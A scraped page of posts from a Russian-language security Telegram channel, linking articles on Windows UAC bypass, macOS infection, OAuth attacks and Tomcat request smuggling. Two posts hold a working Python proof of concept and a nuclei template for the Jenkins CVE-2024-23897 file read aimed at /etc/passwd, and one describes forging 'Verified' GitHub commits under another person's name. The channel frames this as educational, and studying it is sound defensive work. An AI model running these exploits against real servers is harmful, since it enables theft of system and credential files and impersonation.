Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
💻 User Account Control/Uncontrol: Mastering the Art of Bypassing Windows UAC

На фоне того, что знать Windows уже недостаточно для пентеста при проектах по внутрянке, следует изучить различные байпассы. Самыми простым примером будет UAC Bypass, который на удивление легко спрятать от AV. Но с развитием СЗИ и появлением (но не распространением) всяких EDR/XDR/и т.д. приходится более изощренно подходить к процессу анализа защищенности.

Как отметил в своём проекте, у некоторых специалистов вырабатывается скитлстрянка байпассотрянка. Когда видишь новый способ байпасса, но не у компа, а протестить на текущем проекте уже хочется))

⚡️ Поэтому советую вам прочитать эту статью и ждать кое что от меня и ещё пары авторов 😉

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
6❤‍🔥2👾2
Jenkins RCE Arbitrary File Read CVE-2024-23897

Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.

PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()

data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())

print(f'REQ: {data_bytes}\n')

def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)

t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()


Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]


Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3

Патч:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥172
Похек
Jenkins RCE Arbitrary File Read CVE-2024-23897 Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних…
Jenkins nuclei-template
RCE Arbitrary File Read CVE-2024-23897

Пока официально не добавили в nuclei-template. Я не проверял ещё. Не на чем 😢

id: CVE-2024-23897

info:
name: Jenkins < 2.441 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
tags: cve,cve2024,lfi,rce,jenkins

variables:
payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"

javascript:
- code: |
let m = require('nuclei/net');
let name=(Host.includes(':') ? Host : Host+":80");
let conn,conn2;
try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}
conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}
conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
resp = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Hostname}}"

matchers:
- type: dsl
dsl:
- 'contains(response, "No such agent \"")'


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
😥 The Art Of Hiding In Windows

Что сказать вам? Заключающая статья по играм с Windows на этой неделе, но не последняя на канале 😏
В статье будут раскрыты такие направления, как Сокрытие процессов, Core компоненты, Core механики, а также API Hooking.
Предположу, что для прожжённых самоварчиков это будет БАЗА, но для остальных более чем зайдет)

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
Коллеги, сегодняшний день объявляем днем официальной смены названия нашего Клуба Траектория роста 💪

Теперь новое название Клуба - ЗУБРЫ Кибербеза.

На наш взгляд, оно отлично отражает суть того, что происходит внутри Клуба. А именно реализация миссии Клуба - помогать становиться дорогими и востребованными профессионалами по кибербезопасности, т.е. настоящими зубрами кибербеза.

Сейчас Клуб ориентирован на 3 аудитории:
👨 Студенты и совсем начинающие специалисты в ИБ, которые в Клубе могут набраться новых знаний и навыков
👨‍🦱 Действующие специалисты по ИБ, которые в Клубе могут увидеть свои сильные профессиональные и личностные стороны, простроить свой карьерный трек и открыть для себя возможность занимать более интересные и высокооплачиваемые позиции
🧔‍♂️ Руководители по ИБ, которые в Клубе смогут усилить свои управленческие компетенции и взять форматы, реализованные в Клубе, к использованию внутри своих команд

Сейчас к Клубу присоединился партнер - Сергей Зыбнев, с которым у нас грандиозные планы по развитию Клуба.

И уже сегодня всех ждем на пятничной встрече в 18.00 мск, где мы познакомимся с Сергеем и приоткроем наши планы на 2024 год, а заодно спросим вас, чего вы ждете от Клуба/

Сегодняшнюю встречу сделаем открытой, поэтому встретимся на онлайн-трансляции в нашем канале Код ИБ.

Заглядывайте на огонек и присоединяйтесь к Клубу 👋
🐳7🌚33
Forwarded from Cybred
Подделка подписей на Github

Перед тем, как что-нибудь закоммитить в репозиторий, git просит пользователя указать имя и email. Если сделать так
git config --global user.name "Linus Torvalds"
git config --global user.email "torvalds@linux-foundation.org"

Github подхватит почту и будет помечать твои коммиты, как будто их на самом деле сделал Линус, — с его именем, аватаркой и ссылкой на профиль https://github.com/torvalds.

Так может сделать любой, и поэтому существует зеленая надпись "Verified" напротив коммитов, подписанных с помощью GPG.

Если отправить что-нибудь через веб, коммит подпишется от имени GitHub <noreply@github.com> и тоже будет считаться верифицированным.

Для этого сырой блоб отправляется на внутренний эндпоинт https://api.github.com/vscs_internal/commit/sign, где его подхватывает gh-gpgsign и возвращает подписанный результат.

На бэкенде проверяется условие, что строка автора из коммита, полученная с помощью регулярки /\Aauthor (.+?) <(.+)>/, должны быть равна имени текущего залогиненного пользователя.

Но имя может быть пустым, тогда коммит будет таким
author  <583231+octocat@users.noreply.github.com> 1682188800 +0000
author username <user@example.com> 1682188800 +0000

где первая строка — сгенерирована автоматически,
а вторая — фейковая, уже отправленная нами.

Первая не подойдет под регулярку, поэтому будет взята вторая, которую мы контролируем. И так мы можем получить галочку "Verified" на коммит с именем Торвальдса без его подписи, или с любым другим именем.

Автору заплатили $10.000. Баг удалось найти в Codespaces, благодаря реверсу GitHub Enterprise Server Trial VM.
🔥61
'OR 1'='1

Что-то у меня за новогодние праздники подкопилось очень много полезной информации для коллег по цеху, поэтому всем остальным на этой неделе придется еще раз задержать дыхание и немного потерпеть.

В одном из прошлых своих постов я упоминал (это было тут, в контексте премии пентестеров), что изучение отчетов/репортов достаточно сильно расширяет мышление тех, кто трудится в Blue Team и углубляет их познания в специфике Red Team. Так вот, мнение своё я еще не поменял, поэтому всем безопасникам всё также советую почитывать что-то подобное, чтобы быть в курсе актуальных методов эксплуатации уязвимостей, того, как мыслит атакующий и что уже было "пробито".

Собственно, делюсь с вами очень крутым репозиторием в GitHub (ну а где еще), где собраны и регулярно обновляются подборки с теми самыми репортами от этичных хакеров. Авторы заботливо всё отсортировали по типам уязвимостей и даже по отдельным баг-баунти программам различных компаний. Так что вэлкам – сохраняем и распространяем. Можете даже взять себе за привычку регулярно что-то оттуда почитывать по несколько отчётов в день/неделю.

#Полезное

Твой Пакет Безопасности
124🔥32❤‍🔥1🤩1
Forwarded from true_security
Аналог sharphound и других сборщиков для bloodhound (и не только), но собирает информацию по протоколу Active Directory Web Services (ADWS) через SOAP запросы.
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound

P.S. на контроллерах домена должен быть открыт tcp порт 9389
❤‍🔥1
1' Мерч, мерч, мерч --

Сейчас компании во время мероприятий чего только не делают в виде мерча с рекламой своих мероприятий. От верхней одежды до практически штанов и трусов. Но надо ли нам это? И да, и нет. Эту проблему подчеркнул у себя Алексей Лукацкий. Понятно что с его опытом посещения мероприятий по всему миру уже сложно чем-то удивить.

А если спуститься на наш, более человечный уровень. То что бы радовало ваш глаз в контекста мерча? Тонкая подводка, не правда ли?) Ещё с прошлого года корпел над идей своего мерча, который в будущем станет неким брендом в ИБ комьюнити. Уже сделали первую идею мерча, которую можно охарактеризовать, как: "Это было пиздец, как смело" )).

Напишите свои идеи по поводу мерча, можно в чат, можно в ЛС @szybnev. Все идеи приветствуются. Если есть реальный пример или просто референс с мероприятий, тем более делитесь. Сделаем мерч под желания комьюнити!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤‍🔥2
A Practical Guide to PrintNightmare in 2024
#windows

Хотя теоретически проблема PrintNightmare и ее разновидностей была решена корпорацией Microsoft, она продолжает влиять на организации до сих пор, в основном из-за довольно запутанных групповых политик и настроек. В этой статье автор хочет пролить свет на эти проблемы с настройками и дать четкое руководство по их устранению.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5
Forwarded from Cybred
Благодаря устаревшему OAuth-приложению, хакеры из Midnight Blizzard получили доступ ко всей электронной почте компании, включая руководителей, сотрудников юридического отдела и специалистов по кибербезопасности.


Статья от Hadess про вредоносные OAuth-приложения, по мотивам атаки https://blog.devsecopsguides.com/malicious-use-of-oauth-applications.

Скрытые вектора https://portswigger.net/research/hidden-oauth-attack-vectors

Кликабельный чеклист для пентеста https://www.syncubes.com/oauth2_threat_model

Базовые статьи:
OAuth 2.0 Hacking Simplified — Part 1 — Understanding Basics
OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
Finding and Exploiting Unintended Functionality in Main Web App APIs
3
Эта бабушка и до РФ добралась
🤩10😎9🥰331
Forwarded from SecuriXy.kz
Apache Tomcat HTTP Request Smuggling (Client-Side Desync)

Recently, a critical vulnerability was discovered in Apache Tomcat, which was assigned the code CVE-2024-21733

https://hackerone.com/reports/2327341

Vulnerable:
from 8.5.7 through 8.5.63
from 9.0.0-M11 through 9.0.43


Patched: 8.5.64 and 9.0.44

#CVE #Tomcat
🔥9
Forwarded from infosec
• Ущерб от вчерашнего массового сбоя в работе доменной зоны RU мог составить примерно 200 млн рублей, посчитали в Центре компетенций НТИ. https://xn--r1a.website/it_secur/1448

• Как объясняют эксперты, речь идет о недополученной прибыли из-за невозможности осуществить покупки в онлайн-магазинах и сервисах.

#Разное
2
💻 The Art Of Infection In MacOS

Всю прошлую неделю были посты про Windows и прятки в ней против blue team. Подумал, что ущемил Яблочников (будто их можно ущемить ещё больше). Поэтому нашёл статейку по атакам на MacOS. В статье рассмотрены и защита в системе, и какие могут быть вектора атак. Скрипты, Динамические библиотеки, различный environment, Dylib Proxying, Dylib Hijacking, Затрояненные апки (в том числе через пиратский Photoshop 🌚), кастомные URL схемы, офисные макросы, а также атаки через проекты Xcode.
😑 А ещё щепоточка харденинга вашей MacOS.

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰103👏1
Калькулятор прав пользователя Linux
#полезное

💪 Я иногда туплю, когда не понимаю какие надо циферки писать, при разграничении прав в докере, чтобы он был секурнее. Думаю не у одного такая проблема. Поэтому нашёл удобную штуку под названием Chmod Calculator. Смысл в том, что вы тыкаете чекбоксы что вам нужно и он сам считает численное и буквенное значения прав. Полезная штука для многих, особенно для тех у кого нет в голове чипа Илона калькулятора)

➡️ https://chmod-calculator.com/

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚16🔥2🤩21